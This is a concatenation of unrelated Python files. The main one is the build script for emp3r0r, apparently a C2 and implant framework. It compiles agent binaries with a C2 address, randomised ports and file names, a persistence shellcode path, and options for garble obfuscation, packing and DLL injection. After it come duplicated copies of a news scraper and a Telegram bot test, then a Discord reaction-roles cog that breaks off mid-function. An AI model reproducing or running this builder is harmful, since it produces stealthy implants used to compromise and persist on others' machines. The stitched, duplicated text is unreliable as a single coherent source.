cc_other_names=cc_other) gobuild.build() return if target not in ("agent", "agentw"): print("Unknown target") return # indicator use_cached = False if "cc_indicator" in CACHED_CONF: indicator = CACHED_CONF['cc_indicator'] use_cached = yes_no(f"Use cached CC indicator ({indicator})?") if not use_cached: indicator = input( "CC status indicator URL (leave empty to disable): ").strip() CACHED_CONF['cc_indicator'] = indicator if CACHED_CONF['cc_indicator'] != "": # indicator text use_cached = False if "indicator_text" in CACHED_CONF: use_cached = yes_no( f"Use cached CC indicator text ({CACHED_CONF["indicator_text"]})?") if not use_cached: indicator_text = input( "CC status indicator text (leave empty to disable): ").strip() CACHED_CONF['indicator_text'] = indicator_text # Agent proxy use_cached = False if "agent_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached agent proxy ({CACHED_CONF["agent_proxy"]})?") if not use_cached: agentproxy = input( "Proxy server for agent (leave empty to disable): ").strip() CACHED_CONF['agent_proxy'] = agentproxy # CDN use_cached = False if "cdn_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached CDN server ({CACHED_CONF["cdn_proxy"]})?") if not use_cached: cdn = input("CDN websocket server (leave empty to disable): ").strip() CACHED_CONF['cdn_proxy'] = cdn # DoH use_cached = False if "doh_server" in CACHED_CONF: use_cached = yes_no( f"Use cached DoH server ({CACHED_CONF["doh_server"]})?") if not use_cached: doh = input("DNS over HTTP server (leave empty to disable): ").strip() CACHED_CONF['doh_server'] = doh # guardian shellcode path = f"/tmp/{next(tempfile._get_candidate_names())}" CACHED_CONF['guardian_shellcode'] = gen_guardian_shellcode(path) CACHED_CONF['guardian_agent_path'] = path # option to disable autoproxy and broadcasting if not yes_no("Use autoproxy (will enable UDP broadcasting)"): CACHED_CONF['broadcast_interval_max'] = 0 gobuild = GoBuild(target=target, cc_indicator=indicator, cc_ip=ccip) gobuild.build() def log_error(msg): ''' print in red ''' print("\u001b[31m"+msg+"\u001b[0m") def log_warn(msg): ''' print in yellow ''' print("\u001b[33m"+msg+"\u001b[0m") def save(prev_h_len, hfile): ''' append to histfile ''' new_h_len = readline.get_current_history_length() readline.set_history_length(1000) readline.append_history_file(new_h_len - prev_h_len, hfile) # JSON config file, cache some user data BUILD_JSON = "./build/build.json" CACHED_CONF = {} if os.path.exists(BUILD_JSON): try: jsonf = open(BUILD_JSON) CACHED_CONF = json.load(jsonf) jsonf.close() except BaseException: log_warn(traceback.format_exc()) def rand_port(): ''' returns a random int between 1024 and 65535 ''' return str(random.randint(1025, 65534)) def randomize_ports(): ''' randomize every port used by emp3r0r agent, cache them in build.json ''' if 'cc_port' not in CACHED_CONF: CACHED_CONF['cc_port'] = rand_port() if 'sshd_port' not in CACHED_CONF: CACHED_CONF['sshd_port'] = rand_port() if 'proxy_port' not in CACHED_CONF: CACHED_CONF['proxy_port'] = rand_port() if 'broadcast_port' not in CACHED_CONF: CACHED_CONF['broadcast_port'] = rand_port() def gen_guardian_shellcode(path): ''' ../shellcode/gen.py ''' if not shutil.which("nasm"): log_error("nasm not found") try: pwd = os.getcwd() os.chdir("../shellcode") out = subprocess.check_output(["python3", "gen.py", path]) os.chdir(pwd) shellcode = out.decode('utf-8') if "\\x48" not in shellcode: log_error("Failed to generate shellcode: "+out) return "N/A" except BaseException: log_error(traceback.format_exc()) return "N/A" return shellcode def get_version(): ''' print current version ''' try: check = "git describe --tags" out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except KeyboardInterrupt: return "Unknown" except BaseException: check = "git describe --always" try: out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except BaseException: try: versionf = open(".version") version = versionf.read().strip() versionf.close() return version except BaseException: return "Unknown" return out.decode("utf-8").strip() # command line args yes_to_all = False parser = argparse.ArgumentParser(description="Build emp3r0r CC/Agent bianaries") parser.add_argument('--target', type=str, required=True, help='Build target, can be cc/agent/agentw') parser.add_argument('--pack', action="store_true", required=False, help='Pack agent binary, only available under Linux, do not use with --dll') parser.add_argument('--dll', action="store_true", required=False, help='Load agent binary into any processes using shared library injection') parser.add_argument('--garble', action="store_true", required=False, help='Obfuscate agent binary with garble') parser.add_argument('--yes', action="store_true", required=False, help='Do not ask questions, take default answers') args = parser.parse_args() if args.yes: yes_to_all = True try: randomize_ports() if not os.path.exists("./build"): os.mkdir("./build") # support GNU readline interface, command history histfile = "./build/.build_py_history" try: readline.read_history_file(histfile) h_len = readline.get_current_history_length() except FileNotFoundError: open(histfile, 'wb').close() h_len = 0 atexit.register(save, h_len, histfile) main(args.target) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except BaseException: log_error(f"[!] Exception:\n{traceback.format_exc()}")
#!/usr/bin/env python3 # pylint: disable=invalid-name, too-many-branches, too-many-statements, broad-except, too-many-arguments, too-many-instance-attributes, line-too-long ''' this script replaces build.sh, coz bash/sed/awk is driving me insane ''' import argparse import atexit import glob import json import os import random import readline import shutil import subprocess import sys import tempfile import traceback import uuid class GoBuild: ''' all-in-one builder ''' def __init__(self, target="cc", cc_indicator="cc_indicator", cc_ip="[cc_ipaddr]", cc_other_names=""): self.target = target self.GOOS = os.getenv("GOOS") self.GOARCH = os.getenv("GOARCH") if self.GOOS is None: self.GOOS = "linux" if self.target == "agentw": self.GOOS = "windows" if self.GOARCH is None: self.GOARCH = "amd64" # CA self.CA = "" # tags self.CCIP = cc_ip self.CC_OTHER_NAMES = cc_other_names self.INDICATOR = cc_indicator self.UUID = str(uuid.uuid1()) self.VERSION = get_version() # webroot if 'webroot' in CACHED_CONF: self.WebRoot = CACHED_CONF['webroot'] else: self.WebRoot = str(uuid.uuid1()) CACHED_CONF['webroot'] = self.WebRoot # OpSep if 'opsep' in CACHED_CONF: self.OpSep = CACHED_CONF['opsep'] else: self.OpSep = str(uuid.uuid1()) CACHED_CONF['opsep'] = self.OpSep # pid file name if 'pid_file' in CACHED_CONF: self.PIDFile = CACHED_CONF['pid_file'] else: self.PIDFile = rand_str(random.randint(3, 10)) CACHED_CONF['pid_file'] = self.PIDFile # util path name if 'utils_path' in CACHED_CONF: self.UtilsPath = CACHED_CONF['utils_path'] else: self.UtilsPath = rand_str(random.randint(3, 10)) CACHED_CONF['utils_path'] = self.UtilsPath # socket name if 'socket' in CACHED_CONF: self.Socket = CACHED_CONF['socket'] else: self.Socket = rand_str(random.randint(3, 10)) CACHED_CONF['socket'] = self.Socket # indicator text if 'indicator_text' in CACHED_CONF: self.INDICATOR_TEXT = CACHED_CONF['indicator_text'] else: self.INDICATOR_TEXT = "emp3r0r" CACHED_CONF['indicator_text'] = self.INDICATOR_TEXT # agent root directory if "agent_root" in CACHED_CONF: self.AgentRoot = CACHED_CONF['agent_root'] else: # by default mkdir in current directory self.AgentRoot = f"{rand_str(random.randint(5, 10))}" CACHED_CONF['agent_root'] = self.AgentRoot # DoH if "doh_server" not in CACHED_CONF: CACHED_CONF['doh_server'] = "" # agent proxy if "agent_proxy" not in CACHED_CONF: CACHED_CONF['agent_proxy'] = "" # cdn proxy if "cdn_proxy" not in CACHED_CONF: CACHED_CONF['cdn_proxy'] = "" def build(self): ''' cd to cmd and run go build ''' self.gen_certs() # CA if 'ca' in CACHED_CONF: log_warn( f"Using cached CA cert ({CACHED_CONF['ca']}),\nmake sure you have the coresponding keypair signed by it") self.CA = CACHED_CONF['ca'] else: f = open("./tls/rootCA.crt") self.CA = f.read() f.close() # cache CA, too CACHED_CONF['ca'] = self.CA # cache version CACHED_CONF['version'] = self.VERSION # write cached configs json_file = open(BUILD_JSON, "w+") json.dump(CACHED_CONF, json_file, indent=4) json_file.close() self.set_tags() # copy the server/cc keypair to ./build for later use if os.path.isdir("./tls"): log_warn("[*] Copying CC keypair to ./build") for f in glob.glob("./tls/emp3r0r-*pem"): print(f" Copy {f} to ./build") shutil.copy(f, "./build") try: os.chdir(f"./cmd/{self.target}") except BaseException: log_error(f"Cannot cd to cmd/{self.target}") return log_warn("GO BUILD starts...") build_target = f"../../build/{self.target}" if self.target == "agent": build_target = f"../../build/{self.target}-{self.UUID}" elif self.target == "agentw": build_target = f"../../build/{self.target}-{self.UUID}.exe" # go mod os.system('go mod tidy') cmd = f'''GOOS={self.GOOS} GOARCH={self.GOARCH} CGO_ENABLED=0''' + \ f""" go build -o {build_target} -ldflags='-s -w' -trimpath""" # garble if shutil.which("garble") and self.target != "cc" and args.garble: cmd = f'''GOOS={self.GOOS} GOARCH={self.GOARCH} CGO_ENABLED=0 GOPRIVATE=''' + \ f''' garble -literals -tiny build -o {build_target} -ldflags="-v" -trimpath .''' os.system(cmd) log_warn("GO BUILD ends...") os.chdir("../../") self.unset_tags() targetFile = f"./build/{build_target.split('/')[-1]}" if os.path.exists(targetFile): log_warn(f"{targetFile} generated") else: log_error("go build failed") sys.exit(1) # pack agent binary with packer if self.target == "agent" and args.pack: shutil.copy(targetFile, "../packer/agent") os.chdir("../packer") os.system("bash ./build.sh") os.system("CGO_ENABLED=0 ./cryptor.exe") shutil.move("agent.packed.exe", f"../core/{targetFile}") os.chdir("../core") os.chmod(targetFile, 0o755) log_warn(f"{targetFile} packed") def gen_certs(self): ''' generate server cert/key, and CA if necessary ''' if "ccip" in CACHED_CONF: if self.CCIP == CACHED_CONF['ccip'] and os.path.exists("./build/emp3r0r-key.pem"): return log_warn("[!] Generating new certs...") try: os.chdir("./tls") os.system( f"bash ./genkey-with-ip-san.sh {self.UUID} {self.UUID}.com {self.CCIP} {self.CC_OTHER_NAMES}") os.rename(f"./{self.UUID}-cert.pem", "./emp3r0r-cert.pem") os.rename(f"./{self.UUID}-key.pem", "./emp3r0r-key.pem") os.chdir("..") except BaseException as exc: log_error( f"[-] Something went wrong, see above for details: {exc}") sys.exit(1) def set_tags(self): ''' modify some tags in the source ''' # backup source file try: shutil.copy("./lib/tun/tls.go", "/tmp/tls.go") shutil.copy("./lib/tun/api.go", "/tmp/api.go") shutil.copy("./lib/data/def.go", "/tmp/def.go") except BaseException: log_error(f"Failed to backup source files:\n{traceback.format_exc()}") sys.exit(1) # version sed("./lib/data/def.go", '''Version = "[version_string]"''', f'''Version = "{self.VERSION}"''') if self.target == "agent": # guardian shellcode sed("./lib/data/def.go", "[persistence_shellcode]", CACHED_CONF['guardian_shellcode']) sed("./lib/data/def.go", "[persistence_agent_path]", CACHED_CONF['guardian_agent_path']) # CA sed("./lib/tun/tls.go", "[emp3r0r_ca]", self.CA) # webroot sed("./lib/tun/api.go", 'WebRoot = "emp3r0r"', f'WebRoot = "{self.WebRoot}"') # opsep sed("./lib/data/def.go", '''OpSep = "cb433bd1-354c-4802-a4fa-ece518f3ded1"''', f'''OpSep = "{self.OpSep}"''') # Socket name sed("./lib/data/def.go", '''SocketName = AgentRoot + "/.socket"''', f'''SocketName = AgentRoot + "/{self.Socket}"''') # utils path sed("./lib/data/def.go", '''UtilsPath = AgentRoot + "/bin"''', f'''UtilsPath = AgentRoot + "/{self.UtilsPath}"''') # PID file name sed("./lib/data/def.go", '''PIDFile = AgentRoot + "/.pid"''', f'''PIDFile = AgentRoot + "/{self.PIDFile}"''') # CC IP sed("./lib/data/def.go", "CCAddress = \"https://[cc_ipaddr]\"", f"CCAddress = \"https://{self.CCIP}\"") # agent root path sed("./lib/data/def.go", "AgentRoot = \"[agent_root]\"", f"AgentRoot = \"{self.AgentRoot}\"") # indicator sed("./lib/data/def.go", "CCIndicator = \"[cc_indicator]\"", f"CCIndicator = \"{self.INDICATOR}\"") # indicator wait if 'indicator_wait_min' in CACHED_CONF: sed("./lib/data/def.go", "IndicatorWaitMin = 30", f"IndicatorWaitMin = {CACHED_CONF['indicator_wait_min']}") if 'indicator_wait_max' in CACHED_CONF: sed("./lib/data/def.go", "IndicatorWaitMax = 120", f"IndicatorWaitMax = {CACHED_CONF['indicator_wait_max']}") # broadcast_interval if 'broadcast_interval_min' in CACHED_CONF: sed("./lib/data/def.go", "BroadcastIntervalMin = 30", f"BroadcastIntervalMin = {CACHED_CONF['broadcast_interval_min']}") if 'broadcast_interval_max' in CACHED_CONF: sed("./lib/data/def.go", "BroadcastIntervalMax = 120", f"BroadcastIntervalMax = {CACHED_CONF['broadcast_interval_max']}") # cc indicator text sed("./lib/data/def.go", "CCIndicatorText = \"[indicator_text]\"", f"CCIndicatorText = \"{self.INDICATOR_TEXT}\"") # agent UUID sed("./lib/data/def.go", "AgentUUID = \"[agent_uuid]\"", f"AgentUUID = \"{self.UUID}\"") # DoH sed("./lib/data/def.go", "DoHServer = \"\"", f"DoHServer = \"{CACHED_CONF['doh_server']}\"") # CDN sed("./lib/data/def.go", "CDNProxy = \"\"", f"CDNProxy = \"{CACHED_CONF['cdn_proxy']}\"") # Agent Proxy sed("./lib/data/def.go", "AgentProxy = \"\"", f"AgentProxy = \"{CACHED_CONF['agent_proxy']}\"") # ports sed("./lib/data/def.go", "CCPort = \"[cc_port]\"", f"CCPort = \"{CACHED_CONF['cc_port']}\"") sed("./lib/data/def.go", "SSHDPort = \"[sshd_port]\"", f"SSHDPort = \"{CACHED_CONF['sshd_port']}\"") sed("./lib/data/def.go", "ProxyPort = \"[proxy_port]\"", f"ProxyPort = \"{CACHED_CONF['proxy_port']}\"") sed("./lib/data/def.go", "BroadcastPort = \"[broadcast_port]\"", f"BroadcastPort = \"{CACHED_CONF['broadcast_port']}\"") def unset_tags(self): # restore source files try: shutil.move("/tmp/def.go", "./lib/data/def.go") shutil.move("/tmp/tls.go", "./lib/tun/tls.go") shutil.move("/tmp/api.go", "./lib/tun/api.go") except BaseException: log_error(traceback.format_exc()) def clean(): ''' clean build output ''' to_rm = glob.glob("./tls/emp3r0r*") + glob.glob("./tls/openssl-*") + \ glob.glob("./build/*") + glob.glob("./tls/*.csr") for f in to_rm: try: # remove directories too if os.path.isdir(f): os.system(f"rm -rf {f}") else: # we don't need to delete the config file if f.endswith("build.json"): continue os.remove(f) print(" Deleted "+f) except BaseException: log_error(traceback.format_exc) def sed(path, old, new): ''' works like `sed -i s/old/new/g file` ''' rf = open(path) text = rf.read() to_write = text.replace(old, new) rf.close() f = open(path, "w") f.write(to_write) f.close() def yes_no(prompt): ''' y/n? ''' if yes_to_all: log_warn(f"Choosing 'yes' for '{prompt}'") return True answ = input(prompt + " [Y/n] ").lower().strip() if answ in ["n", "no", "nah", "nay"]: return False return True def rand_str(length): ''' random string ''' uuidstr = str(uuid.uuid4()).replace('-', '') # we don't want the string to be long if length >= len(uuidstr): return uuidstr return uuidstr[:length] def main(target): ''' main main main ''' ccip = "" indicator = "" use_cached = False if target == "clean": clean() return # cc IP if "ccip" in CACHED_CONF: ccip = CACHED_CONF['ccip'] use_cached = yes_no(f"Use cached CC address ({ccip})?") if not use_cached: if yes_no("Clean everything and start over?"): clean() ccip = input( "CC server address (domain name or ip address, can be more than one, separate with space):\n> ").strip() CACHED_CONF['ccip'] = ccip if len(ccip.split()) > 1: CACHED_CONF['ccip'] = ccip.split()[0] if target == "cc": cc_other = "" if len(ccip.split()) > 1: cc_other = ' '.join(ccip[1:]) gobuild = GoBuild(target="cc", cc_ip=ccip, cc_other_names=cc_other) gobuild.build() return if target not in ("agent", "agentw"): print("Unknown target") return # indicator use_cached = False if "cc_indicator" in CACHED_CONF: indicator = CACHED_CONF['cc_indicator'] use_cached = yes_no(f"Use cached CC indicator ({indicator})?") if not use_cached: indicator = input( "CC status indicator URL (leave empty to disable): ").strip() CACHED_CONF['cc_indicator'] = indicator if CACHED_CONF['cc_indicator'] != "": # indicator text use_cached = False if "indicator_text" in CACHED_CONF: use_cached = yes_no( f"Use cached CC indicator text ({CACHED_CONF['indicator_text']})?") if not use_cached: indicator_text = input( "CC status indicator text (leave empty to disable): ").strip() CACHED_CONF['indicator_text'] = indicator_text # Agent proxy use_cached = False if "agent_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached agent proxy ({CACHED_CONF['agent_proxy']})?") if not use_cached: agentproxy = input( "Proxy server for agent (leave empty to disable): ").strip() CACHED_CONF['agent_proxy'] = agentproxy # CDN use_cached = False if "cdn_proxy" in CACHED_CONF: use_cached = yes_no( f"Use cached CDN server ({CACHED_CONF['cdn_proxy']})?") if not use_cached: cdn = input("CDN websocket server (leave empty to disable): ").strip() CACHED_CONF['cdn_proxy'] = cdn # DoH use_cached = False if "doh_server" in CACHED_CONF: use_cached = yes_no( f"Use cached DoH server ({CACHED_CONF['doh_server']})?") if not use_cached: doh = input("DNS over HTTP server (leave empty to disable): ").strip() CACHED_CONF['doh_server'] = doh # guardian shellcode path = f"/tmp/{next(tempfile._get_candidate_names())}" CACHED_CONF['guardian_shellcode'] = gen_guardian_shellcode(path) CACHED_CONF['guardian_agent_path'] = path # option to disable autoproxy and broadcasting if not yes_no("Use autoproxy (will enable UDP broadcasting)"): CACHED_CONF['broadcast_interval_max'] = 0 gobuild = GoBuild(target=target, cc_indicator=indicator, cc_ip=ccip) gobuild.build() def log_error(msg): ''' print in red ''' print("\u001b[31m"+msg+"\u001b[0m") def log_warn(msg): ''' print in yellow ''' print("\u001b[33m"+msg+"\u001b[0m") def save(prev_h_len, hfile): ''' append to histfile ''' new_h_len = readline.get_current_history_length() readline.set_history_length(1000) readline.append_history_file(new_h_len - prev_h_len, hfile) # JSON config file, cache some user data BUILD_JSON = "./build/build.json" CACHED_CONF = {} if os.path.exists(BUILD_JSON): try: jsonf = open(BUILD_JSON) CACHED_CONF = json.load(jsonf) jsonf.close() except BaseException: log_warn(traceback.format_exc()) def rand_port(): ''' returns a random int between 1024 and 65535 ''' return str(random.randint(1025, 65534)) def randomize_ports(): ''' randomize every port used by emp3r0r agent, cache them in build.json ''' if 'cc_port' not in CACHED_CONF: CACHED_CONF['cc_port'] = rand_port() if 'sshd_port' not in CACHED_CONF: CACHED_CONF['sshd_port'] = rand_port() if 'proxy_port' not in CACHED_CONF: CACHED_CONF['proxy_port'] = rand_port() if 'broadcast_port' not in CACHED_CONF: CACHED_CONF['broadcast_port'] = rand_port() def gen_guardian_shellcode(path): ''' ../shellcode/gen.py ''' if not shutil.which("nasm"): log_error("nasm not found") try: pwd = os.getcwd() os.chdir("../shellcode") out = subprocess.check_output(["python3", "gen.py", path]) os.chdir(pwd) shellcode = out.decode('utf-8') if "\\x48" not in shellcode: log_error("Failed to generate shellcode: "+out) return "N/A" except BaseException: log_error(traceback.format_exc()) return "N/A" return shellcode def get_version(): ''' print current version ''' try: check = "git describe --tags" out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except KeyboardInterrupt: return "Unknown" except BaseException: check = "git describe --always" try: out = subprocess.check_output( ["/bin/sh", "-c", check], stderr=subprocess.STDOUT, timeout=3) except BaseException: try: versionf = open(".version") version = versionf.read().strip() versionf.close() return version except BaseException: return "Unknown" return out.decode("utf-8").strip() # command line args yes_to_all = False parser = argparse.ArgumentParser(description="Build emp3r0r CC/Agent bianaries") parser.add_argument('--target', type=str, required=True, help='Build target, can be cc/agent/agentw') parser.add_argument('--pack', action="store_true", required=False, help='Pack agent binary, only available under Linux, do not use with --dll') parser.add_argument('--dll', action="store_true", required=False, help='Load agent binary into any processes using shared library injection') parser.add_argument('--garble', action="store_true", required=False, help='Obfuscate agent binary with garble') parser.add_argument('--yes', action="store_true", required=False, help='Do not ask questions, take default answers') args = parser.parse_args() if args.yes: yes_to_all = True try: randomize_ports() if not os.path.exists("./build"): os.mkdir("./build") # support GNU readline interface, command history histfile = "./build/.build_py_history" try: readline.read_history_file(histfile) h_len = readline.get_current_history_length() except FileNotFoundError: open(histfile, 'wb').close() h_len = 0 atexit.register(save, h_len, histfile) main(args.target) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except BaseException: log_error(f"[!] Exception:\n{traceback.format_exc()}")
import requests # importing request library to make https request to google news # importing beautiful soup to extract data from the website from bs4 import BeautifulSoup import csv requirement = int(input( "Please Enter the number of articles that is required in the excel file.\n")) stub = "https://www.news.google.com" URL = "https://news.google.com/topics/CAAqKggKIiRDQkFTRlFvSUwyMHZNRFZxYUdjU0JXVnVMVWRDR2dKSlRpZ0FQAQ?hl=en-IN&gl=IN&ceid=IN%3Aen" r = requests.get(URL) soup = BeautifulSoup(r.text, 'html5lib') extracted_items = [] for row in soup.findAll('a', attrs={'class': 'DY5T1d RZIKme'})[:requirement]: extracted_item = {} extracted_item['Headline'] = row.text extracted_item['Link of news article'] = rf"{stub + row["href"][1:]}" extracted_items.append(extracted_item) filename = "news.csv" with open(filename, 'w', newline="", encoding='utf8') as f: w = csv.DictWriter(f, ['Headline', 'Link of news article']) w.writeheader() for extracted_item in extracted_items: w.writerow(extracted_item)
import requests # importing request library to make https request to google news # importing beautiful soup to extract data from the website from bs4 import BeautifulSoup import csv requirement = int(input( "Please Enter the number of articles that is required in the excel file.\n")) stub = "https://www.news.google.com" URL = "https://news.google.com/topics/CAAqKggKIiRDQkFTRlFvSUwyMHZNRFZxYUdjU0JXVnVMVWRDR2dKSlRpZ0FQAQ?hl=en-IN&gl=IN&ceid=IN%3Aen" r = requests.get(URL) soup = BeautifulSoup(r.text, 'html5lib') extracted_items = [] for row in soup.findAll('a', attrs={'class': 'DY5T1d RZIKme'})[:requirement]: extracted_item = {} extracted_item['Headline'] = row.text extracted_item['Link of news article'] = rf"{stub + row['href'][1:]}" extracted_items.append(extracted_item) filename = "news.csv" with open(filename, 'w', newline="", encoding='utf8') as f: w = csv.DictWriter(f, ['Headline', 'Link of news article']) w.writeheader() for extracted_item in extracted_items: w.writerow(extracted_item)
# coding=utf8 import asyncio import time import threading import pprint import sys import traceback import random import amanobot import amanobot.aio from amanobot.namedtuple import ( InlineQuery, ChosenInlineResult, InputTextMessageContent, InlineQueryResultArticle, InlineQueryResultPhoto, InlineQueryResultGame) def equivalent(data, nt): if type(data) is dict: keys = list(data.keys()) # number of dictionary keys == number of non-None values in namedtuple? if len(keys) != len([f for f in nt._fields if getattr(nt, f) is not None]): return False # map `from` to `from_` fields = list([k+'_' if k in ['from'] else k for k in keys]) return all(map(equivalent, [data[k] for k in keys], [getattr(nt, f) for f in fields])) elif type(data) is list: return all(map(equivalent, data, nt)) else: return data==nt def examine(result, type): try: print('Examining %s ......' % type) nt = type(**result) assert equivalent(result, nt), 'Not equivalent:::::::::::::::\n%s\n::::::::::::::::\n%s' % (result, nt) pprint.pprint(result) pprint.pprint(nt) print() except AssertionError: traceback.print_exc() print('Do you want to continue? [y]', end=' ') answer = input() if answer != 'y': exit(1) def on_inline_query(msg): def compute(): articles = [InlineQueryResultArticle( id='abc', title='HK', input_message_content=InputTextMessageContent(message_text='Hong Kong'), url='https://www.google.com', hide_url=True), {'type': 'article', 'id': 'def', 'title': 'SZ', 'input_message_content': {'message_text': 'Shenzhen'}, 'url': 'https://www.yahoo.com'}] photos = [InlineQueryResultPhoto( id='123', photo_url='https://core.telegram.org/file/811140934/1/tbDSLHSaijc/fdcc7b6d5fb3354adf', thumb_url='https://core.telegram.org/file/811140934/1/tbDSLHSaijc/fdcc7b6d5fb3354adf'), {'type': 'photo', 'id': '345', 'photo_url': 'https://core.telegram.org/file/811140184/1/5YJxx-rostA/ad3f74094485fb97bd', 'thumb_url': 'https://core.telegram.org/file/811140184/1/5YJxx-rostA/ad3f74094485fb97bd', 'caption': 'Caption', 'title': 'Title', 'input_message_content': {'message_text': 'Shenzhen'}}] games = [InlineQueryResultGame( id='abc', game_short_name='sunchaser')] results = random.choice([articles, photos, games]) return results query_id, from_id, query = amanobot.glance(msg, flavor='inline_query') if from_id != USER_ID: print('Unauthorized user:', from_id) return examine(msg, InlineQuery) answerer.answer(msg, compute) def on_chosen_inline_result(msg): result_id, from_id, query = amanobot.glance(msg, flavor='chosen_inline_result') if from_id != USER_ID: print('Unauthorized user:', from_id) return examine(msg, ChosenInlineResult) print('Chosen inline query:') pprint.pprint(msg) TOKEN = sys.argv[1] USER_ID = int(sys.argv[2]) bot = amanobot.aio.Bot(TOKEN) answerer = amanobot.aio.helper.Answerer(bot) loop = asyncio.get_event_loop() print('Give me an inline query.') loop.create_task(bot.message_loop({'inline_query': on_inline_query, 'chosen_inline_result': on_chosen_inline_result})) loop.run_forever()
# coding=utf8 import asyncio import time import threading import pprint import sys import traceback import random import amanobot import amanobot.aio from amanobot.namedtuple import ( InlineQuery, ChosenInlineResult, InputTextMessageContent, InlineQueryResultArticle, InlineQueryResultPhoto, InlineQueryResultGame) def equivalent(data, nt): if type(data) is dict: keys = list(data.keys()) # number of dictionary keys == number of non-None values in namedtuple? if len(keys) != len([f for f in nt._fields if getattr(nt, f) is not None]): return False # map `from` to `from_` fields = list([k+'_' if k in ['from'] else k for k in keys]) return all(map(equivalent, [data[k] for k in keys], [getattr(nt, f) for f in fields])) elif type(data) is list: return all(map(equivalent, data, nt)) else: return data==nt def examine(result, type): try: print('Examining %s ......' % type) nt = type(**result) assert equivalent(result, nt), 'Not equivalent:::::::::::::::\n%s\n::::::::::::::::\n%s' % (result, nt) pprint.pprint(result) pprint.pprint(nt) print() except AssertionError: traceback.print_exc() print('Do you want to continue? [y]', end=' ') answer = input() if answer != 'y': exit(1) def on_inline_query(msg): def compute(): articles = [InlineQueryResultArticle( id='abc', title='HK', input_message_content=InputTextMessageContent(message_text='Hong Kong'), url='https://www.google.com', hide_url=True), {'type': 'article', 'id': 'def', 'title': 'SZ', 'input_message_content': {'message_text': 'Shenzhen'}, 'url': 'https://www.yahoo.com'}] photos = [InlineQueryResultPhoto( id='123', photo_url='https://core.telegram.org/file/811140934/1/tbDSLHSaijc/fdcc7b6d5fb3354adf', thumb_url='https://core.telegram.org/file/811140934/1/tbDSLHSaijc/fdcc7b6d5fb3354adf'), {'type': 'photo', 'id': '345', 'photo_url': 'https://core.telegram.org/file/811140184/1/5YJxx-rostA/ad3f74094485fb97bd', 'thumb_url': 'https://core.telegram.org/file/811140184/1/5YJxx-rostA/ad3f74094485fb97bd', 'caption': 'Caption', 'title': 'Title', 'input_message_content': {'message_text': 'Shenzhen'}}] games = [InlineQueryResultGame( id='abc', game_short_name='sunchaser')] results = random.choice([articles, photos, games]) return results query_id, from_id, query = amanobot.glance(msg, flavor='inline_query') if from_id != USER_ID: print('Unauthorized user:', from_id) return examine(msg, InlineQuery) answerer.answer(msg, compute) def on_chosen_inline_result(msg): result_id, from_id, query = amanobot.glance(msg, flavor='chosen_inline_result') if from_id != USER_ID: print('Unauthorized user:', from_id) return examine(msg, ChosenInlineResult) print('Chosen inline query:') pprint.pprint(msg) TOKEN = sys.argv[1] USER_ID = int(sys.argv[2]) bot = amanobot.aio.Bot(TOKEN) answerer = amanobot.aio.helper.Answerer(bot) loop = asyncio.get_event_loop() print('Give me an inline query.') loop.create_task(bot.message_loop({'inline_query': on_inline_query, 'chosen_inline_result': on_chosen_inline_result})) loop.run_forever()
import disnake from typing import Union from disnake.ext import commands import database as db import constants as var from functions import get_prefix from ext.permissions import has_command_permission class ReactionRoles(commands.Cog): def __init__(self, bot): self.bot = bot async def cog_check(self, ctx): """Simple check to see if this cog (plugin) is enabled.""" guild_doc = await db.PLUGINS.find_one({"_id": ctx.guild.id}) if guild_doc.get("ReactionRoles"): return True else: await ctx.send( embed=disnake.Embed( description=( f"{var.E_DISABLE} The Reaction Roles plugin" " is disabled in this server" ), color=var.C_ORANGE ) ) @commands.command() @has_command_permission() async def rr( self, ctx, channel: disnake.TextChannel = None, message_id: Union[int, None] = None, role: disnake.Role = None, emoji: Union[disnake.Emoji, str] = None ): if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if {channel, message_id, role, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the channel, message, " "role and emoji all three to add a reaction role," " make sure the IDs are numerical." ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}rr" " <#channel> <messageid> <role> <emoji>`" ) ).set_footer( text=( "You can use either role ID or mention it (use ID if " "you don't want to disturb everyone having the role)" ) ) ) bot_member = ctx.guild.get_member(self.bot.user.id) try: bot_role = bot_member.roles[1] except IndexError: bot_role = bot_member.roles[0] try: msg = channel.get_partial_message(message_id) except Exception: raise commands.MessageNotFound(ctx) if bot_role.position >= role.position: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is None: await db.REACTION_ROLES.insert_one( { "_id": ctx.guild.id, "reaction_roles": [{ "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) }], "unique_messages": [] } ) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: guildrr_list = guild_doc["reaction_roles"] def check(): for i in guildrr_list: if i.get("messageid") == msg.id and i.get( "emoji") == str(emoji): return True if check(): await ctx.send( "You have already setup this reaction role" f" using {emoji} on that message :D " "I can see it in the database!" ) else: new_list = guildrr_list.copy() new_list.append( { "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) } ) new_data = { "$set": { "reaction_roles": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: await ctx.send( embed=disnake.Embed( title="Role position error", description=( f"The role {role.mention} is above my role " f"({bot_role.mention}), in order for me to update any " f"role (reaction roles) my role needs to be above that " f"role, just move my role above your reaction role as " f"shown below\n\n **Server Settings > Roles > Click on" f" the {bot_role.mention} Role > Drag it above the " f"{role.mention} Role **(Shown as the Developer role in" f" the image below)" ), color=var.C_RED ).set_image( url=( "https://cdn.disnakeapp.com/attachments/" "843519647055609856/850711272726986802/unknown.png" ) ) ) @commands.command(name="removerr") @has_command_permission() async def remove_rr( self, ctx, message_id: Union[int, str] = None, 